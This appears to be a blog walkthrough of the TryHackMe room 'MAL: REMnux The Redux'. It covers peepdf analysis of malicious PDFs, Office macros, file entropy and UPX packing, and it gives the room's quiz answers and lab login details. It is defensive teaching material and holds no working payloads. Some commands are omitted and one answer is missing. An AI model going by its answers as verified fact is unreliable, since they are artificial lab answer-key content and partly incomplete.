MAL: REMnux The Redux TryHackme
By Shamsher khna This is a Writeup of Tryhackme room “MAL:REMnux The Redux”
What we learn in this room
- Identifying and analysing malicious payloads of various formats embedded in PDF’s, EXE’s and Microsoft Office Macros (the most common method that malware developers use to spread malware today)
- Learning how to identify obfuscated code and packed files — and in turn — analyse these.
- Analysing the memory dump of a PC that became infected with the Jigsaw ransomware in the real-world using Volatility.
IP Address: 10.10.32.28
Username: remnux
Password: malware
ssh remnux@10.10.32.28
Task 3. Analysing Malicious PDF’s
Question 1. How many types of categories of “Suspicious elements” are there in “notsuspicious.pdf”
Answer: 3
Question 2. Use peepdf to extract the javascript from “notsuspicious.pdf”. What is the flag?
Note the output confirming that there’s Javascript present, but also how it is executed? OpenAction will execute the code when the PDF is launched.
To extract this Javascript, we can use peepdf’s “extract” module. This requires a few steps to set up but is fairly trivial.
The following command will create a script file for peepdf to use:
The script will extract all javascript via extract js and pipe > the contents into “javascript-from-notsuspicious.pdf”
We now need to tell peepdf the name of the script (extracted_javascript.txt) and the PDF file that we want to extract from (notsuspicious.pdf):
Remembering that the Javascript will output into a file called “javascript-from-demo_nonsuspicious.pdf” because of our script.
To recap: “extracted_javascript.txt” (highlighted in red) is our script, where “notsuspicious.pdf” (highlighted in green) is the original PDF file that we think is malicious.
Question 3.How many types of categories of “Suspicious elements” are there in “advert.pdf”
Now Run this command peepdf advert.pdf
Answer: 6
Question 4. Now use peepdf to extract the javascript from “advert.pdf”. What is the value of “cName”?
Answer: notsuspicious
Task 4. Analysing Malicious Microsoft Office Macros
Question 1. What is the name of the Macro for “DefinitelyALegitInvoice.doc”
Answer: DefoLegit
Question 2. What is the URL the Macro in “Taxes2020.doc” would try to launch?
Task 5. I Hope You Packed Your Bags
But first: Entropy 101
There’s a reason why I’ve waited until now to discuss file entropy in the malware series.
REMnux provides a nice range of command-line tools that allow for bulk or semi-automated classification and static analysis. File entropy is very indicative of the suspiciousness of a file and is a prominent characteristic that these tools look for within a Portable Executable (PE).
At it’s very simplest, file entropy is a rating that scores how random the data within a PE file is. With a scale of 0 to 8. 0 meaning the less “randomness” of the data in the file, where a scoring towards 8 indicates this data is more “random”.
For example, files that are encrypted will have a very high entropy score. Where files that have large chunks of the same data such as “1's” will have a low entropy score.
Okay…so?
Malware authors use techniques such as encryption or packing (we’ll come onto this next) to obfuscate their code and to attempt to bypass anti-virus. Because of this, these files will have high entropy. If an analyst had 1,000 files, they could rank the files by their entropy scoring, of course, the files with the higher entropy should be analysed first.
To illustrate, this file would have a low entropy because the data has a pattern to it.
Whereas however, this file would have a high entropy because there’s no pattern to the data — it’s a lot more random in comparison.
Packing and Unpacking
I briefly discussed this in my MAL: Introductory room, but that doesn’t do this topic justice.
We’ll start with a bit of theory (so bare with me here) on how packing works and why it’s used. Packer’s use an executable as a source and output’s it to another executable. This executable will have had some modifications made depending on the packer. For example, the new executable could be compressed and/or obfuscated by using mathematics.
Legitimate software developers use packing to reduce the size of their applications and to ultimately protect their work from being stolen. It is, however, a double-edged sword, malware authors reap the benefits of packing to make the reverse engineering and detection of the code hard to impossible.
Executables have what’s called an entry point. When launched, this entry point is simply the location of the first pieces of code to be executed within the file — as illustrated below:
(Sikorski and Honig, 2012)
When an executable is packed, it must unpack itself before any code can execute. Because of this, packers change the entry point from the original location to what’s called the “Unpacking Stub”.
(Sikorski and Honig, 2012)
The “Unpacking Stub” will begin to unpack the executable into its original state. Once the program is fully unpacked, the entry point will now relocate back to its normal place to begin executing code:
(Sikorski and Honig, 2012)
It is only at this point can an analyst begin to understand what the executable is doing as it is now in it’s true, original form.
Determining if an Executable is Packed
Don’t worry, learning how to manually unpack an executable is out-of-scope for this pathway. We have a few tools at our arsenal that should do a sufficient job for most of the samples we come across in the wild.
Packed files have a few characteristics that may indicate whether or not they are packed:
- Remember about file entropy? Packed files will have a high entropy!
- There are very few “Imports”, packed files may only have “GetProcAddress” and “LoadLibrary”.
- The executable may have sections named after certain packers such as UPX.
Demonstration
I have two copies of my application, one not packed and another has been packed.
Below we can see that this copy has 34 imports, so a noticeable amount and the imports are quite revealing in what we can expect the application to do:
Whereas the other copy only presents us with 6 imports.
We can verify that this was packed using UPX via tools such as PEID, or by manually comparing the executables sections and filesize differences.
Look at that entropy! 7.526 out of 8! Also, note the name of the sections. UPX0 and the entry point being at UPX1...that's our packer.
Question 1. What is the highest file entropy a file can have?
Answer: 8
Question 2. What is the lowest file entropy a file can have?
Answer: 0
Question 3. Name a common packer that can be used for applications?
Answer: UPX
Additional Reading
[BlackHat 2019] Investigating Malware Using Memory Forensics (Video)
Malware Threat Report — Q2 2020 (Avira)
Malware Detection in PDF and Office Documents: A survey
Cheatsheets
Volatility 2.4. Windows & Linux Profile Cheatsheets
Please Follow on LinkedIn Twitter
Written by Shamsher khan
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
